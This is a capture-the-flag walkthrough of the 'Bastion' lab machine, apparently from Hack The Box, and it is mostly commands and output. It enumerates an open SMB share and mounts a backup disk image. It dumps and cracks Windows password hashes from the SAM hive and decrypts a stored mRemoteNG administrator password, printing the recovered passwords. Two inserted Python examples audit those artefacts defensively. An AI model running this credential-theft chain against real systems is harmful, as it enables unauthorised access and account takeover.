$nmap -A -p- -T4 10.10.10.134
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 08:49 CET
Nmap scan report for 10.10.10.134
Host is up (0.036s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-03T08:50:53+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-03T07:50:49
|_ start_date: 2020-12-03T07:47:17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.94 seconds
Open ports:
- 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
- 135/tcp open msrpc Microsoft Windows RPC
- 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
- 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
- 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- 49664/tcp open msrpc Microsoft Windows RPC
- 49665/tcp open msrpc Microsoft Windows RPC
- 49666/tcp open msrpc Microsoft Windows RPC
- 49667/tcp open msrpc Microsoft Windows RPC
- 49668/tcp open msrpc Microsoft Windows RPC
- 49669/tcp open msrpc Microsoft Windows RPC
- 49670/tcp open msrpc Microsoft Windows RPC
Since the SMB port (445) is open, let’s enumerate the shares.
$smbclient -N -L //10.10.10.134/
Sharename Type Comment
-------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
We can access the Backups share without a password.
$smbclient -N //10.10.10.134/Backups
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 12:02:11 2019
.. D 0 Tue Apr 16 12:02:11 2019
note.txt AR 116 Tue Apr 16 12:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 13:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 13:44:02 2019
7735807 blocks of size 4096. 2763904 blocks available
smb: \> mget note.txt
Get file note.txt? yes
getting file \note.txt of size 116 as note.txt (0,7 KiloBytes/sec) (average 0,7 KiloBytes/sec)
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup> dir
. Dn 0 Fri Feb 22 13:44:02 2019
.. Dn 0 Fri Feb 22 13:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 13:45:32 2019
7735807 blocks of size 4096. 2763904 blocks available
smb: \WindowsImageBackup> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC> dir
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 13:45:32 2019
Catalog Dn 0 Fri Feb 22 13:45:32 2019
MediaId An 16 Fri Feb 22 13:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 13:45:32 2019
7735807 blocks of size 4096. 2763901 blocks available
smb: \WindowsImageBackup\L4mpje-PC> cd "Backup 2019-02-22 124351\"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351> dir
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 13:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 13:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 13:45:32 2019
7735807 blocks of size 4096. 2763389 blocks available
We find two VHD files.
A VHD file is a Virtual Hard Disk image. More information can be found at
https://en.wikipedia.org/wiki/VHD_(file_format)
The note.txt file we downloaded says:
$cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Downloading these files to our local box is not practical, so we need a different approach.
Searching on Google, we find ways to mount these files remotely.
https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
https://www.jamescoyle.net/tag/qemu-nbd
$cd /mnt/
$sudo mkdir remote
$sudo mount -t cifs //10.10.10.134/Backups/ /mnt/remote/ -o rw
$cd remote/
$ls
note.txt SDT65CB.tmp WindowsImageBackup
$cd WindowsImageBackup/
$ls
L4mpje-PC
$cd L4mpje-PC/
$ls
'Backup 2019-02-22 124351' Catalog MediaId SPPMetadataCache
$cd Backup\ 2019-02-22\ 124351/
$ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
$cd /mnt/
$ls
remote
$sudo mkdir vhd
$qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
qemu-nbd: Failed to open /dev/nbd0: No such file or directory
qemu-nbd: Disconnect client, due to: Failed to read request: Unexpected end-of-file before all bytes were read
$cd /dev/
$sudo modprobe nbd
$sudo qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
$sudo mount -r /dev/nbd0p1 /mnt/vhd
$cd /mnt/vhd/
$ls
'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs 'Program Files' ProgramData Recovery 'System Volume Information' Users Windows
$cd Users/L4mpje/Desktop
$ls
desktop.ini
There is no user flag.
Let’s then perform an in-depth analysis of the Windows system.
One of the first things to check is the Security Account Manager (SAM) database, whose registry hive files are stored in Windows/System32/config.
https://en.wikipedia.org/wiki/Security_Account_Manager
$ls -la
total 74740
drwxrwxrwx 1 root root 12288 feb 22 2019 .
drwxrwxrwx 1 root root 655360 feb 22 2019 ..
-rwxrwxrwx 2 root root 28672 feb 22 2019 BCD-Template
-rwxrwxrwx 2 root root 25600 feb 22 2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 feb 22 2019 COMPONENTS
-rwxrwxrwx 2 root root 1048576 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root 1048576 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root 1048576 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root 65536 feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root 65536 feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root 524288 feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root 524288 jul 14 2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root 1024 abr 12 2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root 262144 feb 22 2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root 262144 feb 22 2019 DEFAULT
-rwxrwxrwx 1 root root 1024 abr 12 2011 DEFAULT.LOG
-rwxrwxrwx 2 root root 91136 feb 22 2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 DEFAULT.LOG2
drwxrwxrwx 1 root root 0 jul 14 2009 Journal
drwxrwxrwx 1 root root 0 feb 22 2019 RegBack
-rwxrwxrwx 1 root root 262144 feb 22 2019 SAM
-rwxrwxrwx 1 root root 1024 abr 12 2011 SAM.LOG
-rwxrwxrwx 2 root root 21504 feb 22 2019 SAM.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SAM.LOG2
-rwxrwxrwx 1 root root 262144 feb 22 2019 SECURITY
-rwxrwxrwx 1 root root 1024 abr 12 2011 SECURITY.LOG
-rwxrwxrwx 2 root root 21504 feb 22 2019 SECURITY.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 feb 22 2019 SOFTWARE
-rwxrwxrwx 1 root root 1024 abr 12 2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root 262144 feb 22 2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root 9699328 feb 22 2019 SYSTEM
-rwxrwxrwx 1 root root 1024 abr 12 2011 SYSTEM.LOG
-rwxrwxrwx 2 root root 262144 feb 22 2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root 0 jul 14 2009 SYSTEM.LOG2
drwxrwxrwx 1 root root 4096 nov 20 2010 systemprofile
drwxrwxrwx 1 root root 4096 feb 22 2019 TxR
We have read access to the SAM and SYSTEM hive files.
Together they can be used to extract the local accounts’ password hashes and obtain deeper access.
$samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
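To read that output from a defender's side, the following added example (not part of the original write-up) parses the pwdump-style lines and notes which accounts carry an empty-string hash and which enabled accounts expose a real NT hash. The `Account` class and the `parse_pwdump` and `findings` helpers are names introduced here for illustration.

```python
from dataclasses import dataclass

# Hashes of the empty string; both appear in the samdump2 output above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the three lines printed by samdump2 on this page.
SAMPLE = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""


@dataclass
class Account:
    name: str
    rid: int
    lm: str
    nt: str
    disabled: bool


def parse_pwdump(text):
    """Parse 'name:rid:lm:nt:::' lines, honouring samdump2's '*disabled*' prefix."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        fields = line.split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue  # blank line or not a pwdump record
        accounts.append(Account(fields[0], int(fields[1]),
                                fields[2].lower(), fields[3].lower(), disabled))
    return accounts


def findings(acct):
    """Defensive notes for one account."""
    notes = []
    if acct.lm != EMPTY_LM:
        notes.append("LM hash stored")
    if acct.nt == EMPTY_NT:
        notes.append("empty-string NT hash" + ("" if acct.disabled else " on enabled account"))
    elif not acct.disabled:
        notes.append("enabled account with unsalted NT hash exposed")
    return notes


if __name__ == "__main__":
    for a in parse_pwdump(SAMPLE):
        print(f"{a.name} (RID {a.rid}): {', '.join(findings(a)) or 'nothing to report'}")
```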
Let’s crack L4mpje’s hash.
$hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 2868/2932 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
26112010952d963c8dc4217daec986d9:bureaulampje
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9
Time.Started.....: Thu Dec 3 11:09:03 2020 (8 secs)
Time.Estimated...: Thu Dec 3 11:09:11 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1398.6 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 9396224/14344385 (65.50%)
Rejected.........: 0/9396224 (0.00%)
Restore.Point....: 9394176/14344385 (65.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: burlfish85 -> burbank105
Started: Thu Dec 3 11:08:39 2020
Stopped: Thu Dec 3 11:09:12 2020
The password is bureaulampje.
Now we just need to log in to L4mpje’s account over SSH.
$ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfeXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Next, let’s look for a way to the administrator’s flag.
PS C:\Program Files (x86)> dir
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 16-7-2016 15:23 Common Files
d----- 23-2-2019 09:38 Internet Explorer
d----- 16-7-2016 15:23 Microsoft.NET
da---- 22-2-2019 14:01 mRemoteNG
d----- 23-2-2019 10:22 Windows Defender
d----- 23-2-2019 09:38 Windows Mail
d----- 23-2-2019 10:22 Windows Media Player
d----- 16-7-2016 15:23 Windows Multimedia Platform
d----- 16-7-2016 15:23 Windows NT
d----- 23-2-2019 10:22 Windows Photo Viewer
d----- 16-7-2016 15:23 Windows Portable Devices
d----- 16-7-2016 15:23 WindowsPowerShell
PS C:\Program Files (x86)>
There is an installation of mRemoteNG.
mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager for Windows. mRemoteNG adds bug fixes and new features to mRemote. It allows you to view all of your remote connections in a simple yet powerful tabbed interface.
https://mremoteng.org/
PS C:\Program Files (x86)\mRemoteNG> type .\Changelog.txt
1.76.11 (2018-10-18):
Fixes:
------
#1139: Feature "Reconnect to previously opened sessions" not working
#1136: Putty window not maximized
1.76.10 (2018-10-07):
Fixes:
------
#1124: Enabling themes causes an exception
1.76.9 (2018-10-07):
Fixes:
------
#1117: Duplicate panel created when "Reconnect on Startup" and "Create Empty Panel" settings enabled
#1115: Exception when changing from xml data storage to SQL
According to this file, the installed mRemoteNG version is 1.76.11.
According to the following article, this version stores saved passwords insecurely.
https://hackersvanguard.com/mremoteng-insecure-password-storage/
$scp l4mpje@10.10.10.134:./AppData/Roaming/mRemoteNG/confCons.xml .
l4mpje@10.10.10.134's password:
confCons.xml 100% 6316 154.2KB/s 00:00
$ls
confCons.xml hash.txt
$cat confCons.xml
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node
Name="DC"
Type="Connection"
Descr="" Icon="mRemoteNG"
Panel="General"
Id="500e7d58-662a-44d4-aff0-3a4f547a3fee"
Username="Administrator"
Domain=""
Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1"
Protocol="RDP"
...
We can now decrypt the password.
https://github.com/haseebT/mRemoteNG-Decrypt
$wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
--2020-12-03 12:24:53-- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1535 (1,5K) [text/plain]
Grabando a: “mremoteng_decrypt.py”
mremoteng_decrypt.py 100%[=============================================================================================================================================================>] 1,50K --.-KB/s en 0s
2020-12-03 12:24:53 (4,42 MB/s) - “mremoteng_decrypt.py” guardado [1535/1535]
$python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
The Administrator password is then thXLHM96BeKL0ER2.
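The same file can be reviewed defensively. This added example (not part of the original write-up or of mRemoteNG) reads the attributes shown in the confCons.xml excerpt above and reports file-level settings and the connections that embed a saved password. The sample XML is constructed with placeholder secrets, and `MIN_KDF_ITERATIONS` and `audit_confcons` are names and values assumed here.

```python
import xml.etree.ElementTree as ET

# Assumed local policy floor for key-derivation iterations; not an mRemoteNG constant.
MIN_KDF_ITERATIONS = 100_000

# Constructed sample modelled on the excerpt above: same attribute names,
# secrets replaced by placeholders, plus one hypothetical node without a password.
SAMPLE = """\
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="PLACEHOLDER-BASE64" Hostname="127.0.0.1" Protocol="RDP" />
  <Node Name="Lab" Type="Container">
    <Node Name="jump" Type="Connection" Username="svc" Password=""
          Hostname="192.0.2.10" Protocol="SSH2" />
  </Node>
</mrng:Connections>
"""


def audit_confcons(xml_text):
    """Return file-level weaknesses and the connections that embed a password."""
    root = ET.fromstring(xml_text)
    file_findings = []
    if root.get("FullFileEncryption", "false").lower() != "true":
        file_findings.append("FullFileEncryption off: hosts and usernames are in clear text")
    try:
        iterations = int(root.get("KdfIterations", "0"))
    except ValueError:
        iterations = 0
    if iterations < MIN_KDF_ITERATIONS:
        file_findings.append(f"KdfIterations={iterations} is below the policy floor")
    # Node elements carry no namespace prefix, so a plain tag match finds them
    # at any nesting depth (containers included).
    stored = [
        (n.get("Name"), n.get("Username"), n.get("Hostname"), n.get("Protocol"))
        for n in root.iter("Node")
        if n.get("Type") == "Connection" and n.get("Password")
    ]
    return {"file": file_findings, "stored": stored}


if __name__ == "__main__":
    result = audit_confcons(SAMPLE)
    for finding in result["file"]:
        print("[file]", finding)
    for name, user, host, proto in result["stored"]:
        print(f"[cred] {name}: {user}@{host} via {proto} has a saved password")
```

Every connection it lists is a credential that should be rotated if the file has been readable by another account or included in a backup.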
Finally, we can connect as Administrator.
$ssh administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
9588XXXXXXXXXXXXXXXXXXXXXXXXXXXX